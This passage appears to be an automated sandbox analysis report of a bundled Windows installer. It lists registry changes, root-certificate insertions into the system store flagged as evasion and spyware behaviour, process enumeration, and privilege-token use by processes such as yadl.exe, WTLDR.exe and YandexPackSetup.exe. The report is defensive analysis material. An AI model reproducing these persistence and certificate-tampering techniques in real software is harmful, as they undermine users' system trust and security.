Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexEPUB.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.epub\OpenWithProgids\YandexEPUB.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.jpg\OpenWithProgids\YandexJPEG.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCRX.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser CRX Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexJPEG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexJPEG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBM.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser WEBM Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBM.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexTIFF.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.mhtml\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,-122" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexINFE.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
